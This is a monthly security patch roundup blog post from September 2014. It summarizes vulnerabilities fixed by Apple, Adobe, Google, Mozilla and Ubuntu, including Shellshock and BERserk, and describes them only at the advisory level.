It’s been another interesting month on the patch and vulnerability front, but this time the focus has been less on Microsoft products (although the company did have to pull one problematic non-security patch that was causing problems for OneDrive for Business customers. The big news when it comes to updating problems, though, was the release of iOS 8, which fixed more than 50 security vulnerabilities in Apple’s mobile operating system but which also introduced a multitude of bugs and functionality problems, and the resulting fiasco in which Apple released a fix that caused even bigger problems and then yanked the latter update on the same day it was released.
Then along came BASH, also known as Shellshock – a critical vulnerability in the BASH shell that is the default shell in most implementations of Linux/UNIX, including OS X – creating a double whammy for Apple users.
Meanwhile, Adobe took the conservative course and delayed the release of its patches this month. Instead of putting them out on Patch Tuesday as is their usual practice, they waited a week in order to do further testing. No doubt they were anxious to avoid the kind of problems (and resultant PR) that they saw Microsoft deal with in August. It’s likely they were doubly glad they went with the “better late than untested” philosophy after all the iOS troubles emerged.
Apple
Apple released a total of seven updates this month (eight if you count the short-lived and no-longer-available iOS 8.0.1 update), for various products. All seven were released on September 17.
- iOS 8 was released for the iPhone 4, 5 and 6, iPod Touch 5th generation and later, and the iPad 2 and later. The major OS update added features and addressed 53 security vulnerabilities in the previous versions of the OS. I covered all the vulnerabilities in detail in my earlier blog post so I won’t repeat it all here.
- Apple also released an update for OS X Mountain Lion and OS X Mavericks, the latest versions of its desktop/laptop operating system. It addressed more than 40 security vulnerabilities, including multiple issues in PHP in Apache, a validation in Bluetooth that could allow arbitrary code execution, an out-of-bounds memory read in CoreGraphics that could result in information disclosure upon opening a malicious PDF, a Foundation issue with the NSXML Parser that could result in information disclosure, a user space buffer overflow in the Intel Graphics driver that could lead to arbitrary code execution, an IOKit API vulnerability, an out-of-bounds read issue in the IOAccleratorFamily code, another in the IOHIDFamily code that could be used to bypass kernel ASLR, two IOKit issues that could allow arbitrary code execution with system privileges, a kernel vulnerability that could be used to bypass ASLR, a flaw in Libnotify by which malware could execute code with root privileges, multiple vulnerabilities in OpenSSL, three issues with QT Media Foundation and a heap buffer overlow issue in ruby.
- Two updates were released for OS X Server, one for version 2.2.3 running on Mountain Lion and one for version 3.2.1 running on Mavericks. Both addressed multiple vulnerabilities that include a SQL injection issue in Wiki Server, a cross-site scripting issue in Xcode Server, and multiple vulnerabilities in PostgreSQL. These are critical vulnerabilities that could result in arbitrary execution of SQL queries, arbitrary code or arbitrary JavaScript. The fixes imposed additional validation of SQL queries, improved encoding of HTML output, and updated PostgreSQL to version 9.2.7.
- An update for Safari 6.2 and 7.1 running on Mountain Lion and Mavericks addressed nine vulnerabilities in the web browser itself and in WebKit. The first vulnerability involved saved passwords that were autofilled on HTTP sites, HTTPS sites with broken trust and in iFrames, which could enable an attacker to intercept user credentials. It was fixed by restricting autofill to passwords in the main fame of HTTPS sites with valid certificate validation. The WebKit vulnerabilities included multiple memory corruption issues that could be used to execute arbitrary code or could cause unexpected application crashes, as well as a flaw in the way web application could store cache data so that web sites could track users even with private browsing enabled. These were addressed by improving memory handling and disabling access to the cache in private browsing mode.
- An update was released for Xcode running on Mavericks 10.9.4 or later, to address a single vulnerability by which an attacker could cuase Subversion to terminate unexpectedly, resulting in a denial of service.
- Apple also issued an update for Apple TV (3rd generation and later), which addressed more than 30 separate vulnerabilities in various components of the Apple TV software, including those by which attackers could obtain users’ wi-fi credentials, access sensitive user information from logs, arbitrarily execute code, crash the system, cause unexpected restarts, read data from kernel memory, create a denial of service, bypass kernel hardening measures, and change permissions on files.
Adobe
As noted in my previous blog post, Adobe released two updates on September 16, a week past its normal schedule.
- Update APSB14-20 is an update for Adobe Reader and Acrobat running on Windows and Macintosh OS X computers. This patch addresses 8 vulnerabilities in Reader X and XI and Acrobat X and XI. The vulnerabilities include a denial of service vulnerability, a heap overflow vulnerability, multiple memory corruption vulnerabilities and a use-after-free issue. The last three could all result in code execution. Also included are a universal cross-site scripting issue (on the Mac platform only), a sandbox bypass (on Windows only). The update is given a priority rating of 1 and the severity rating is critical on both Windows and Mac.
- Update APSB14-21 is an update for Adobe Flash Player on Windows, Macintosh OS X and Linux. It addresses 12 vulnerabilities that could potentially allow an attacker to take control of the system. The vulnerabilities include multiple memory leakage issues that could be used to bypass ASLR, a security bypass vulnerability, a use-after-free vulnerability that can be exploited to run code, and memory corruption vulnerabilities that also can lead to code execution, as well as a vulnerability that can be exploited to bypass the same origin policy and a heap buffer overflow vulnerability that could result in execution of arbitrary code. This update is assigned a priority rating of 1 for Adobe Flash Player on Windows and Mac machines and 3 for Flash Player on Linux and Adobe AIR. The severity rating is critical for all platforms.
Google updated the Chrome web browser for Windows, Mac and Linux on September 9. The update fixes 4 security vulnerabilities, including a use-after-free vulnerability and various fixes from internal audits. The new version of Chrome is 37.0.2062.120 and it includes an update for Adobe Flash.
Since this seems to be the season for problematic patches, it comes as no surprise that many users who updated to this version of Chrome were reporting issues, specifically a “Shockwave Flash has crashed” message. This isn’t an unusual occurrence; troubles with Shockwave on Chrome have been going on for a while. Here’s an article that explains a common cause of the crashes and how to fix it: How to stop Shockwave Flash crashing in Google Chrome.
Oracle
Oracle is on a quarterly release cycle, and July was the most recent month for updates. The next updates are scheduled to be released on October 14.
Mozilla
Mozilla released updates to fix a critical vulnerability in the Mozilla Network Security Services (NSS) cryptographic library, which could be exploited to create forged RSA certificates and trick users into revealing personal information to a fraudulent web site. The bug is being called BERserk, and the library is used by the Firefox browser, Thunderbird mail client and other Mozilla products. The latest release of Firefox that fixes the issue is 32.0.3. It is also fixed in Thunderbird 31.1.2 and 24.8.1 and in SeaMonkey 2.29.1. SeaMonkey is a project to develop an all-in-one Internet application suite (browser, mail, newsgroups, HTML editor, chat and web development tools.
Linux
As usual, popular Linux distros saw a large number of updates issued in September. Ubuntu issued 40 patches between September 3 and September 25. This was eleven more than were issued in August. Other commercial Linux vendors issued similar updates.
- 363-2: Bash vulnerability – 25th September 2014. USN-2363-1 fixed a vulnerability in Bash. Due to a build issue, the patch for CVE-2014-7169 didn’t get properly applied in the Ubuntu 14.04 LTS package. This update fixes the problem.
- USN-2363-1: Bash vulnerability – 25th September 2014. Tavis Ormandy discovered that the security fix for Bash included in USN-2362-1 was incomplete. An attacker could use this issue to bypass certain environment restrictions.
- USN-2360-2: Thunderbird vulnerabilities – 24th September 2014. USN-2360-1 fixed vulnerabilities in Firefox. This update provides the corresponding updates for Thunderbird. Original advisory details: Antoine Delignat-Lavaud and others discovered that NSS incorrectly handled parsing ASN.1 values. An attacker could use this issue to forge RSA certificates.
- USN-2360-1: Firefox vulnerabilities – 24th September 2014. Antoine Delignat-Lavaud and others discovered that NSS incorrectly handled parsing ASN.1 values. An attacker could use this issue to forge RSA certificates.
- USN-2361-1: NSS vulnerability – 24th September 2014. Antoine Delignat-Lavaud and others discovered that NSS incorrectly handled parsing ASN.1 values. An attacker could use this issue to forge RSA certificates.
- USN-2362-1: Bash vulnerability – 24th September 2014. Stephane Chazelas discovered that Bash incorrectly handled trailing code in function definitions. An attacker could use this issue to bypass environment restrictions, such as SSH forced command environments.
- USN-2359-1: Linux kernel vulnerabilities – 23rd September 2014. Jack Morgenstein reported a flaw in the page handling of the KVM (Kerenl Virtual Machine) subsystem in the Linux kernel. A guest OS user could exploit this flaw to cause a denial of service (host OS memory corruption) or possibly have other unspecified impact on the host OS.
- USN-2358-1: Linux kernel (Trusty HWE) vulnerabilities – 23rd September 2014. Jack Morgenstein reported a flaw in the page handling of the KVM (Kerenl Virtual Machine) subsystem in the Linux kernel. A guest OS user could exploit this flaw to cause a denial of service (host OS memory corruption) or possibly have other unspecified impact on the host OS.
- USN-2357-1: Linux kernel (OMAP4) vulnerabilities – 23rd September 2014. Jack Morgenstein reported a flaw in the page handling of the KVM (Kerenl Virtual Machine) subsystem in the Linux kernel. A guest OS user could exploit this flaw to cause a denial of service (host OS memory corruption) or possibly have other unspecified impact on the host OS.
- USN-2356-1: Linux kernel vulnerabilities – 23rd September 2014. Jack Morgenstein reported a flaw in the page handling of the KVM (Kerenl Virtual Machine) subsystem in the Linux kernel. A guest OS user could exploit this flaw to cause a denial of service (host OS memory corruption) or possibly have other unspecified impact on the host OS.
- USN-2355-1: Linux kernel (EC2) vulnerabilities – 23rd September 2014. Chris Evans reported an flaw in the Linux kernel’s handling of iso9660 (compact disk filesystem) images. An attacker who can mount a custom iso9660 image either via a CD/DVD drive or a loopback mount could cause a denial of service (system crash or reboot).
- USN-2354-1: Linux kernel vulnerabilities – 23rd September 2014. Chris Evans reported an flaw in the Linux kernel’s handling of iso9660 (compact disk filesystem) images. An attacker who can mount a custom iso9660 image either via a CD/DVD drive or a loopback mount could cause a denial of service (system crash or reboot).
- USN-2353-1: APT vulnerability – 23rd September 2014. It was discovered that APT incorrectly handled certain http URLs. If a remote attacker were able to perform a man-in-the-middle attack, this flaw could be exploited to cause APT to crash, resulting in a denial of service, or possibly execute arbitrary code.
- USN-2352-1: DBus vulnerabilities – 22nd September 2014. Simon McVittie discovered that DBus incorrectly handled the file descriptors message limit. A local attacker could use this issue to cause DBus to crash, resulting in a denial of service, or possibly execute arbitrary code.
- USN-2351-1: nginx vulnerability – 22nd September 2014. Antoine Delignat-Lavaud and Karthikeyan Bhargavan discovered that nginx incorrectly reused cached SSL sessions. An attacker could possibly use this issue in certain configurations to obtain access to information from a different virtual host.
- USN-2350-1: NSS update – 22nd September 2014. The NSS package contained outdated CA certificates. This update refreshes the NSS package to version 3.17 which includes the latest CA certificate bundle.
- USN-2349-1: Libav vulnerabilities – 17th September 2014. It was discovered that Libav incorrectly handled certain malformed media files. If a user were tricked into opening a crafted media file, an attacker could cause a denial of service via application crash, or possibly execute arbitrary code with the privileges of the user invoking the program.
- USN-2319-3: OpenJDK 7 update – 16th September 2014. USN-2319-1 fixed vulnerabilities in OpenJDK 7. This update provides stability fixes for the arm64 and ppc64el architectures. Original advisory details: Several vulnerabilities were discovered in the OpenJDK JRE related to information disclosure, data integrity and availability.
- USN-2348-1: APT vulnerabilities – 16th September 2014. It was discovered that APT did not re-verify downloaded files when the If-Modified-Since wasn’t met. (CVE-2014-0487) It was discovered that APT did not invalidate repository data when it switched from an unauthenticated to an authenticated state. (CVE-2014-0488) It was discovered that the APT Acquire::GzipIndexes option caused APT to skip checksum.
- USN-2347-1: Django vulnerabilities – 16th September 2014. Florian Apolloner discovered that Django incorrectly validated URLs. A remote attacker could use this issue to conduct phishing attacks. (CVE-2014-0480) David Wilson discovered that Django incorrectly handled file name generation. A remote attacker could use this issue to cause Django to consume resources, resulting in a denial of service.
- USN-2346-1: curl vulnerabilities – 15th September 2014. Tim Ruehsen discovered that curl incorrectly handled partial literal IP addresses. This could lead to the disclosure of cookies to the wrong site, and malicious sites being able to set cookies for others. (CVE-2014-3613) Tim Ruehsen discovered that curl incorrectly allowed cookies to be set for Top Level Domains (TLDs).
- USN-2330-1: Thunderbird vulnerabilities – 11th September 2014. Jan de Mooij, Christian Holler, Karl Tomlinson, Randell Jesup, Gary Kwong, Jesse Ruderman and JW Wang discovered multiple memory safety issues in Thunderbird. If a user were tricked in to opening a specially crafted message with scripting enabled, an attacker could potentially exploit these to cause a denial of service.
- USN-2344-1: PHP vulnerabilities – 9th September 2014. It was discovered that the Fileinfo component in php5 contains an integer overflow. An attacker could use this flaw to cause a denial of service or possibly execute arbitrary code via a crafted CDF file. (CVE-2014-3587) It was discovered that the php_parserr function contains multiple buffer overflows.
- USN-2343-1: NSS vulnerability – 9th September 2014. Tyson Smith and Jesse Schwartzentruber discovered that NSS contained a race condition when performing certificate validation. An attacker could use this issue to cause NSS to crash, resulting in a denial of service, or possibly execute arbitrary code.
- USN-2342-1: QEMU vulnerabilities – 8th September 2014. Michael S. Tsirkin, Anthony Liguori, and Michael Roth discovered multiple issues with QEMU state loading after migration. An attacker able to modify the state data could use these issues to cause a denial of service, or possibly execute arbitrary code.
- USN-2341-1: CUPS vulnerabilities – 8th September 2014. Salvatore Bonaccorso discovered that the CUPS web interface incorrectly validated permissions and incorrectly handled symlinks. An attacker could possibly use this issue to bypass file permissions and read arbitrary files, possibly leading to a privilege escalation.
- USN-2306-3: GNU C Library regression – 8th September 2014. USN-2306-1 fixed vulnerabilities in the GNU C Library. On Ubuntu 10.04 LTS, the fix for CVE-2013-4357 introduced a memory leak in getaddrinfo. This update fixes the problem. We apologize for the inconvenience. Original advisory details: Maksymilian Arciemowicz discovered that the GNU C Library incorrectly handled the getaddrinfo() function.
- USN-2340-1: procmail vulnerability – 4th September 2014. Tavis Ormandy discovered that the formail tool incorrectly handled certain malformed mail headers. An attacker could use this flaw to cause formail to crash, resulting in a denial of service, or possibly execute arbitrary code.
- USN-2339-2: Libgcrypt vulnerability – 3rd September 2014. Daniel Genkin, Adi Shamir, and Eran Tromer discovered that Libgcrypt was susceptible to an adaptive chosen ciphertext attack via physical side channels. A local attacker could use this attack to possibly recover private keys.
- USN-2339-1: GnuPG vulnerability – 3rd September 2014. Daniel Genkin, Adi Shamir, and Eran Tromer discovered that GnuPG was susceptible to an adaptive chosen ciphertext attack via physical side channels. A local attacker could use this attack to possibly recover private keys.
- USN-2338-1: Lua vulnerability – 3rd September 2014. It was discovered that Lua incorrectly handled certain vararg functions with a large number of fixed parameters. An attacker could use this issue to cause Lua applications to crash, resulting in a denial of service, or possibly execute arbitrary code.
- USN-2326-1: Oxide vulnerabilities – 2nd September 2014. A use-after-free was discovered in the SVG implementation in Blink. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via renderer crash, or execute arbitrary code with the privileges of the sandboxed render process.
- USN-2329-1: Firefox vulnerabilities – 2nd September 2014. Jan de Mooij, Christian Holler, Karl Tomlinson, Randell Jesup, Gary Kwong, Jesse Ruderman, JW Wang and David Weir discovered multiple memory safety issues in Firefox. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service.
- USN-2337-1: Linux kernel vulnerabilities – 2nd September 2014. A flaw was discovered in the Linux kernel virtual machine’s (kvm) validation of interrupt requests (irq). A guest OS user could exploit this flaw to cause a denial of service (host OS crash). (CVE-2014-0155) Andy Lutomirski discovered a flaw in the authorization of netlink socket operations.
- USN-2336-1: Linux kernel (Trusty HWE) vulnerabilities – 2nd September 2014. A flaw was discovered in the Linux kernel virtual machine’s (kvm) validation of interrupt requests (irq). A guest OS user could exploit this flaw to cause a denial of service (host OS crash). (CVE-2014-0155) Andy Lutomirski discovered a flaw in the authorization of netlink socket operations when a socket.
- USN-2335-1: Linux kernel (OMAP4) vulnerabilities – 2nd September 2014. A flaw was discovered in the Linux kernel’s audit subsystem when auditing certain syscalls. A local attacker could exploit this flaw to obtain potentially sensitive single-bit values from kernel memory or cause a denial of service (OOPS).
- USN-2334-1: Linux kernel vulnerabilities – 2nd September 2014. A flaw was discovered in the Linux kernel’s audit subsystem when auditing certain syscalls. A local attacker could exploit this flaw to obtain potentially sensitive single-bit values from kernel memory or cause a denial of service (OOPS).
- USN-2331-1: LibreOffice vulnerability – 2nd September 2014. Rohan Durve and James Kettle discovered LibreOffice Calc sometimes allowed for command injection when opening spreadsheets. If a user were tricked into opening a crafted Calc spreadsheet, an attacker could exploit this to run programs as your login.
- USN-2333-1: Linux kernel (EC2) vulnerabilities – 2nd September 2014. A bug was discovered in the handling of pathname components when used with an autofs direct mount. A local user could exploit this flaw to cause a denial of service (system crash) via an open system call.
- USN-2332-1: Linux kernel vulnerabilities – 2nd September 2014. A bug was discovered in the handling of pathname components when used with an autofs direct mount. A local user could exploit this flaw to cause a denial of service (system crash) via an open system call.